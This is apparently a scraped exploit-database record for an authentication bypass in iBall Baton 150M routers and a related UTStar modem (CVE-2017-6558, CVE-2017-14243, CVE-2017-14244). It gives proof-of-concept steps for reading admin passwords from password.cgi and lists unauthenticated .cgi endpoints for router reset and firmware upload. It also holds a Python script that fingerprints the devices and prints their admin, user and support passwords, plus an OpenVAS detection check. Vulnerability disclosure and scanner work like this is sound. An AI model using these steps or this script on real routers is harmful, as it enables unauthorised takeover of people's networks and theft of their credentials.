ID 1337DAY-ID-28401 Type zdt Reporter Indrajith.A.N Modified 2017-08-30T00:00:00
Description
Exploit for cgi platform in category web applications
Title:
====
iball Baton 150M Wireless router - Authentication Bypass
Credit:
======
Name: Indrajith.A.N
Website: https://www.indrajithan.com
Date:
====
07-03-2017
Vendor:
======
iball Envisioning the tremendous potential for innovative products required
by the ever evolving users in computing and digital world, iBall was
launched in September 2001 and which is one of the leading networking
company
Product:
=======
iball Baton 150M Wireless-N ADSI.2+ Router
Product link:
http://www.iball.co.in/Product/150M-Wireless-N-Broadband-Router/539
Abstract:
=======
iball Baton 150M Router's login page is insecurely developed that any
attacker could bypass the admin's authentication just by tweaking the
password.cgi file.
Affected Version:
=============
Firmware Version : 1.2.6 build 110401 Rel.47776n
Hardware Version : iB-WRA150N v1 00000001
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
9
Details:
=======
Any attacker can escalate his privilege to admin using this vulnerability.
Proof Of Concept:
================
1) Navigate to Routers Login page which is usually IPV4 default Gateway IP,
i.e 172.20.174.1
2) Now just append password.cgi to the URL i.e
http://172.20.174.1/password.cgi
3) Right-click and View Source code which disclsus the username, password
and user role of the admin in the comment section
4) Successfully logged in using the disclosed credentials.
Reference:
=========
Video POC :
https://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing
Disclosure Timeline:
======================================
Vendor Notification: March 5, 2017
-----
Indrajith.A.N
# 0day.today [2018-01-11] #
{"href": "https://0day.today/exploit/description/28401", "sourceData": "Title:\r\n====\r\niball Baton 150M Wireless router - Authentication Bypass\r\n \r\nCredit:\r\n======\r\nName: Indrajith.A.N\r\nWebsite: https://www.indrajithan.com\r\n \r\nDate:\r\n====\r\n07-03-2017\r\n \r\nVendor:\r\n======\r\niball Envisioning the tremendous potential for innovative products required\r\nby the ever evolving users in computing and digital world, iBall was\r\nlaunched in September 2001 and which is one of the leading networking\r\ncompany\r\n \r\nProduct:\r\n=======\r\niball Baton 150M Wireless-N ADSI.2+ Router\r\n \r\nProduct link:\r\nhttp://www.iball.co.in/Product/150M-Wireless-N-Broadband-Router/539\r\n \r\nAbstract:\r\n=======\r\niball Baton 150M Router's login page is insecurely developed that any\r\nattacker could bypass the admin's authentication just by tweaking the\r\npassword.cgi file.\r\n \r\nAffected Version:\r\n=============\r\nFirmware Version : 1.2.6 build 110401 Rel.47776n\r\nHardware Version : iB-WRA150N v1 00000001\r\n \r\nExploitation-Technique:\r\n===================\r\nRemote\r\n \r\nSeverity Rating:\r\n===================\r\n9\r\n \r\nDetails:\r\n=======\r\nAny attacker can escalate his privilege to admin using this vulnerability.\r\n \r\nProof Of Concept:\r\n================\r\n1) Navigate to Routers Login page which is usually IPV4 default Gateway IP,\r\ni.e 172.20.174.1\r\n \r\n2) Now just append password.cgi to the URL i.e\r\nhttp://172.20.174.1/password.cgi\r\n \r\n3) Right-click and View Source code which disclsus the username, password\r\nand user role of the admin in the comment section\r\n \r\n4) Successfully logged in using the disclosed credentials.\r\n \r\nReference:\r\n=========\r\nVideo POC :\r\nhttps://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing\r\n \r\nDisclosure Timeline:\r\n======================================\r\nVendor Notification: March 5, 2017\r\n \r\n-----\r\nIndrajith.A.N\n\n# 0day.today [2018-01-11] #", "bulletinFamily": "exploit", "modified": "2017-08-30T00:00:00", "title": "iBall Baton 150M Wireless Router - Authentication Bypass Vulnerability", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/", "score": 5.0}, "sourceHref": "https://0day.today/exploit/28401", "cvelist": ["CVE-2017-6558"], "description": "Exploit for cgi platform in category web applications", "viewCount": 6, "published": "2017-08-30T00:00:00", "edition": 1, "id": "1337DAY-ID-28401", "type": "zdt", "lastseen": "2018-01-11T03:06:10", "reporter": "Indrajith.A.N", "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2018-01-11T03:06:10", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-6558"]}, {"type": "exploitdb", "idList": ["EDB-ID:42591"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811313"]}, {"type": "seebug", "idList": ["SSV:96645", "SSV:96644"]}], "modified": "2018-01-11T03:06:10", "rev": 2}, "vulnersScore": 6.1}, "references": []}
{"cve": [{"lastseen": "2021-02-02T06:36:48", "description": "iball Baton 150M iB-WRA150N v1 00000001 1.2.6 build 110401 Rel.47776n devices are prone to an authentication bypass vulnerability that allows remote attackers to view and modify administrative router settings by reading the HTML source code of the password.cgi file.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-09T09:59:00", "title": "CVE-2017-6558", "type": "cve", "cwe": ["CWE-798"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6558"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:iball:baton_150m_wireless-n_router_firmware:1.2.6"], "id": "CVE-2017-6558", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6558", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:iball:baton_150m_wireless-n_router_firmware:1.2.6:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2017-08-30T21:07:36", "description": "iBall Baton 150M Wireless Router - Authentication Bypass. CVE-2017-6558. Webapps exploit for PHP platform", "published": "2017-03-07T00:00:00", "type": "exploitdb", "title": "iBall Baton 150M Wireless Router - Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6558"], "modified": "2017-03-07T00:00:00", "id": "EDB-ID:42591", "href": "https://www.exploit-db.com/exploits/42591/", "sourceData": "Title:\r\n====\r\niball Baton 150M Wireless router - Authentication Bypass\r\n\r\nCredit:\r\n======\r\nName: Indrajith.A.N\r\nWebsite: https://www.indrajithan.com\r\n\r\nDate:\r\n====\r\n07-03-2017\r\n\r\nVendor:\r\n======\r\niball Envisioning the tremendous potential for innovative products required\r\nby the ever evolving users in computing and digital world, iBall was\r\nlaunched in September 2001 and which is one of the leading networking\r\ncompany\r\n\r\nProduct:\r\n=======\r\niball Baton 150M Wireless-N ADSI.2+ Router\r\n\r\nProduct link:\r\nhttp://www.iball.co.in/Product/150M-Wireless-N-Broadband-Router/539\r\n\r\nAbstract:\r\n=======\r\niball Baton 150M Router's login page is insecurely developed that any\r\nattacker could bypass the admin's authentication just by tweaking the\r\npassword.cgi file.\r\n\r\nAffected Version:\r\n=============\r\nFirmware Version : 1.2.6 build 110401 Rel.47776n\r\nHardware Version : iB-WRA150N v1 00000001\r\n\r\nExploitation-Technique:\r\n===================\r\nRemote\r\n\r\nSeverity Rating:\r\n===================\r\n9\r\n\r\nDetails:\r\n=======\r\nAny attacker can escalate his privilege to admin using this vulnerability.\r\n\r\nProof Of Concept:\r\n================\r\n1) Navigate to Routers Login page which is usually IPV4 default Gateway IP,\r\ni.e 172.20.174.1\r\n\r\n2) Now just append password.cgi to the URL i.e\r\nhttp://172.20.174.1/password.cgi\r\n\r\n3) Right-click and View Source code which disclsus the username, password\r\nand user role of the admin in the comment section\r\n\r\n4) Successfully logged in using the disclosed credentials.\r\n\r\nReference:\r\n=========\r\nVideo POC :\r\nhttps://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing\r\n\r\nDisclosure Timeline:\r\n======================================\r\nVendor Notification: March 5, 2017\r\n\r\n-----\r\nIndrajith.A.N", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/42591/"}], "openvas": [{"lastseen": "2020-05-12T17:06:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6558", "CVE-2017-14244"], "description": "The host is running iBall Baton 150M\n Wireless Router and is prone to authentication bypass vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2017-08-31T00:00:00", "id": "OPENVAS:1361412562310811313", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811313", "type": "openvas", "title": "iBall Baton 150M Wireless Router Authentication Bypass Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# iBall Baton 150M Wireless Router Authentication Bypass Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:iball:baton_150m_wireless-n_router\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811313\");\n script_version(\"2020-05-08T11:13:33+0000\");\n script_cve_id(\"CVE-2017-6558\", \"CVE-2017-14244\");\n script_bugtraq_id(96822);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 11:13:33 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-08-31 12:06:39 +0530 (Thu, 31 Aug 2017)\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n script_name(\"iBall Baton 150M Wireless Router Authentication Bypass Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is running iBall Baton 150M\n Wireless Router and is prone to authentication bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to get specific information or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - iball Baton 150M Router login page is insecurely developed and any attacker\n could bypass the admin authentication just by tweaking the password.cgi file.\n\n - iBall ADSL2+ Home Router does not properly authenticate when pages are\n accessed through cgi version.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to bypass authentication mechanism and perform\n unauthorized actions and can access sensitive information and perform actions\n such as reset router, downloading backup configuration, upload backup etc.\n This may lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"iBall Baton 150M Wireless-N ADSI.2+ Router 1.2.6 build 110401.\n iBall ADSL2+ Home Router WRA150N Firmware version FW_iB-LR7011A_1.0.2\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/42591\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/42740\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2017/Mar/22\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_iball_baton_150m_wireless_router_detect.nasl\");\n script_mandatory_keys(\"iBall_Baton_150M_Router/detected\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif(!netPort = get_app_port(cpe:CPE))\n exit(0);\n\nurl = \"/password.cgi\";\n\nreq = http_get(item: url, port:netPort);\nrcvRes = http_keepalive_send_recv(port:netPort, data:req);\n\nif(rcvRes =~ \"^HTTP/1\\.[01] 200\" && \">Access Control -- Password<\" >< rcvRes &&\n \"Access to your DSL router\" >< rcvRes && \"pwdAdmin =\" >< rcvRes &&\n \"pwdSupport =\" >< rcvRes && \"pwdUser =\" >< rcvRes)\n{\n report = http_report_vuln_url(port:netPort, url:url);\n security_message( port:netPort, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:15:10", "description": "### Exploit Title: iBall ADSL2+ Home Router Authentication Bypass Vulnerability\r\n* CVE: CVE-2017-14244\r\n* Date: 15-09-2017\r\n* Exploit Author: Gem George\r\n* Author Contact: https://www.linkedin.com/in/gemgrge\r\n* Vulnerable Product: iBall ADSL2+ Home Router WRA150N https://www.iball.co.in/Product/ADSL2--Home-Router/746\r\n* Firmware version: FW_iB-LR7011A_1.0.2\r\n* Vendor Homepage: https://www.iball.co.in\r\n* Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass\r\n \r\n \r\n### Vulnerability Details\r\niBall ADSL2+ Home Router does not properly authenticate when pages are accessed through cgi version. This could potentially allow a remote attacker access sensitive information and perform actions such as reset router, downloading backup configuration, upload backup etc.\r\n \r\n### How to reproduce\r\nSuppose 192.168.1.1 is the router IP and one of the valid page in router is is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi\r\n \r\n### Example URLs:\r\n* http://192.168.1.1/info.cgi \u2013 Status and details\r\n* http://192.168.1.1/upload.cgi \u2013 Firmware Upgrade\r\n* http://192.168.1.1/backupsettings.cgi \u2013 perform backup settings to PC\r\n* http://192.168.1.1/pppoe.cgi \u2013 PPPoE settings\r\n* http://192.168.1.1/resetrouter.cgi \u2013 Router reset\r\n* http://192.168.1.1/password.cgi \u2013 password settings", "published": "2017-10-11T00:00:00", "type": "seebug", "title": "iBall ADSL2+ Home Router Authentication Bypass Vulnerability(CVE-2017-14244)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14243", "CVE-2017-14244", "CVE-2017-6558"], "modified": "2017-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96644", "id": "SSV:96644", "sourceData": "\n #/bin/python\r\n# -*- coding: utf-8 -*- \r\nimport sys\r\nimport os\r\nimport urllib2\r\nimport argparse\r\nimport re\r\nfrom termcolor import colored\r\n\r\ndef get_response(url):\r\n\tresponse = urllib2.urlopen(url)\r\n\treturn response.read()\r\n\r\ndef get_info(url):\r\n\tres = get_response(url + '/info.cgi')\r\n\tif \"iB-WRA150N\" in res: \t\r\n\t\tprint colored('[INF]','green'), 'Device identified: iBall 150M Wireless-N ADSL2+ Router (iB-WRA150N)'\r\n\t\tprint colored('[RES]', 'red'), 'Vulnerable to CVE-2017-6558'\r\n\t\tprint colored('[RES]', 'red'), 'Firmware Version: ' + find_between(res, '<td>', '</td>')\r\n\t\tget_cred(url)\r\n\telse:\r\n\t\tif \"ADSL2+\" in res:\t\t\r\n\t\t\tprint colored('[INF]','green'), 'Device identified: iBall ADSL2+ Home Router WRA150N'\r\n\t\t\tprint colored('[RES]','red'), 'Vulnerable to CVE-2017-14244'\r\n\t\t\tprint colored('[RES]','red'),'Firmware Version: FW' + find_between(res, 'FW', '</td>')\r\n\t\telse:\r\n\t\t\tif \"96338W\" in res:\t\r\n\t\t\t\tprint colored('[INF]','green'), 'Device identified: UTStar WA3002G4 ADSL Broadband Modem'\r\n\t\t\t\tprint colored('[RES]','red'), 'Vulnerable to CVE-2017-14243'\r\n\t\t\t\tget_cred(url)\r\n\t\t\telse:\r\n\t\t\t\tprint colored('[INF]','green'), 'Device not vulnerable to CVE-2017-6558, CVE-2017-14243 or CVE-2017-14244'\r\n\t\r\n\tprint colored('\\r\\nCompleted!\\r\\n','green'), \r\ndef get_cred(url):\r\n\tres = get_response(url + '/password.cgi')\r\n\tmatches = re.findall(\"(?<=\\s').*?(?=')\", res, re.DOTALL)\r\n\tprint '\\nUsernames\\tPasswords\\n', colored('---------\\t----------', 'green')\r\n\tprint 'admin\\t\\t' + matches[0] + '\\nuser\\t\\t' + matches[1] + '\\nsupport\\t\\t' + matches[2]\r\n\r\ndef find_between( s, first, last ):\r\n\ttry:\r\n\t\tstart = s.index( first ) + len( first )\r\n\t\tend = s.index( last, start )\r\n\t\treturn s[start:end]\r\n\texcept ValueError:\r\n \treturn \"\"\r\n\r\ndef display_info():\r\n\tprint colored('\\r\\n\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6','green')\r\n\tprint colored('\u00a6','green'), ' Check for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244\t', colored('\u00a6','green')\r\n\tprint colored('\u00a6','green'), '\t\t Created by: Gem George\t\t\t\t' , colored('\u00a6','green')\r\n\tprint colored('\u00a6','green'), '\t Website: https://www.techipick.com/ \t\t\t', colored('\u00a6','green')\r\n\tprint colored('\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6','green')\r\n\tprint \"\\r\\n\"\r\n\tprint colored('[SET]','blue'), 'Target URL: ', sys.argv[1]\r\n\r\ndef main():\r\n\tif len(sys.argv) != 2:\r\n\t\tprint 'Wrong argument count\\nEg: ' + os.path.basename(__file__) + ' http://192.168.1.1'\r\n\t\texit()\r\n\telse:\r\n\t\tdisplay_info()\t\t\r\n\t\turl = sys.argv[1].rstrip('/')\r\n\t\tget_info(url)\r\n \r\nif __name__ == \"__main__\":\r\n main()\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96644"}, {"lastseen": "2017-11-19T12:15:10", "description": "### Exploit Title: UTStar WA3002G4 ADSL Broadband Modem Authentication Bypass Vulnerability\r\n* CVE: CVE-2017-14243\r\n* Date: 15-09-2017\r\n* Exploit Author: Gem George\r\n* Author Contact: https://www.linkedin.com/in/gemgrge\r\n* Vulnerable Product: UTStar WA3002G4 ADSL Broadband Modem\r\n* Firmware version: WA3002G4-0021.01\r\n* Vendor Homepage: http://www.utstar.com/\r\n* Reference: https://www.techipick.com/iball-baton-adsl2-home-router-utstar-wa3002g4-adsl-broadband-modem-authentication-bypass\r\n \r\n \r\n### Vulnerability Details\r\nThe CGI version of the admin page of UTStar modem does not authenticate the user and hence any protected page in the modem can be directly accessed by replacing page extension with cgi. This could also allow anyone to perform operations such as reset modem, change passwords, backup configuration without any authentication. The modem also disclose passwords of each users (Admin, Support and User) in plain text behind the page source. \r\n \r\n### How to reproduce\r\n\r\nSuppose 192.168.1.1 is the device IP and one of the admin protected page in the modem is http://192.168.1.1/abcd.html, then the page can be directly accessed as as http://192.168.1.1/abcd.cgi\r\n \r\n### Example URLs:\r\n* http://192.168.1.1/info.cgi \u2013 Status and details\r\n* http://192.168.1.1/upload.cgi \u2013 Firmware Upgrade\r\n* http://192.168.1.1/backupsettings.cgi \u2013 perform backup settings to PC\r\n* http://192.168.1.1/pppoe.cgi \u2013 PPPoE settings\r\n* http://192.168.1.1/resetrouter.cgi \u2013 Router reset\r\n* http://192.168.1.1/password.cgi \u2013 password settings", "published": "2017-10-11T00:00:00", "type": "seebug", "title": "UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass(CVE-2017-14243)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14243", "CVE-2017-14244", "CVE-2017-6558"], "modified": "2017-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96645", "id": "SSV:96645", "sourceData": "\n #/bin/python\r\n# -*- coding: utf-8 -*- \r\nimport sys\r\nimport os\r\nimport urllib2\r\nimport argparse\r\nimport re\r\nfrom termcolor import colored\r\n\r\ndef get_response(url):\r\n\tresponse = urllib2.urlopen(url)\r\n\treturn response.read()\r\n\r\ndef get_info(url):\r\n\tres = get_response(url + '/info.cgi')\r\n\tif \"iB-WRA150N\" in res: \t\r\n\t\tprint colored('[INF]','green'), 'Device identified: iBall 150M Wireless-N ADSL2+ Router (iB-WRA150N)'\r\n\t\tprint colored('[RES]', 'red'), 'Vulnerable to CVE-2017-6558'\r\n\t\tprint colored('[RES]', 'red'), 'Firmware Version: ' + find_between(res, '<td>', '</td>')\r\n\t\tget_cred(url)\r\n\telse:\r\n\t\tif \"ADSL2+\" in res:\t\t\r\n\t\t\tprint colored('[INF]','green'), 'Device identified: iBall ADSL2+ Home Router WRA150N'\r\n\t\t\tprint colored('[RES]','red'), 'Vulnerable to CVE-2017-14244'\r\n\t\t\tprint colored('[RES]','red'),'Firmware Version: FW' + find_between(res, 'FW', '</td>')\r\n\t\telse:\r\n\t\t\tif \"96338W\" in res:\t\r\n\t\t\t\tprint colored('[INF]','green'), 'Device identified: UTStar WA3002G4 ADSL Broadband Modem'\r\n\t\t\t\tprint colored('[RES]','red'), 'Vulnerable to CVE-2017-14243'\r\n\t\t\t\tget_cred(url)\r\n\t\t\telse:\r\n\t\t\t\tprint colored('[INF]','green'), 'Device not vulnerable to CVE-2017-6558, CVE-2017-14243 or CVE-2017-14244'\r\n\t\r\n\tprint colored('\\r\\nCompleted!\\r\\n','green'), \r\ndef get_cred(url):\r\n\tres = get_response(url + '/password.cgi')\r\n\tmatches = re.findall(\"(?<=\\s').*?(?=')\", res, re.DOTALL)\r\n\tprint '\\nUsernames\\tPasswords\\n', colored('---------\\t----------', 'green')\r\n\tprint 'admin\\t\\t' + matches[0] + '\\nuser\\t\\t' + matches[1] + '\\nsupport\\t\\t' + matches[2]\r\n\r\ndef find_between( s, first, last ):\r\n\ttry:\r\n\t\tstart = s.index( first ) + len( first )\r\n\t\tend = s.index( last, start )\r\n\t\treturn s[start:end]\r\n\texcept ValueError:\r\n \treturn \"\"\r\n\r\ndef display_info():\r\n\tprint colored('\\r\\n\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6','green')\r\n\tprint colored('\u00a6','green'), ' Check for CVE-2017-6558, CVE-2017-14243 & CVE-2017-14244\t', colored('\u00a6','green')\r\n\tprint colored('\u00a6','green'), '\t\t Created by: Gem George\t\t\t\t' , colored('\u00a6','green')\r\n\tprint colored('\u00a6','green'), '\t Website: https://www.techipick.com/ \t\t\t', colored('\u00a6','green')\r\n\tprint colored('\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6\u00a6','green')\r\n\tprint \"\\r\\n\"\r\n\tprint colored('[SET]','blue'), 'Target URL: ', sys.argv[1]\r\n\r\ndef main():\r\n\tif len(sys.argv) != 2:\r\n\t\tprint 'Wrong argument count\\nEg: ' + os.path.basename(__file__) + ' http://192.168.1.1'\r\n\t\texit()\r\n\telse:\r\n\t\tdisplay_info()\t\t\r\n\t\turl = sys.argv[1].rstrip('/')\r\n\t\tget_info(url)\r\n \r\nif __name__ == \"__main__\":\r\n main()\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96645"}]}
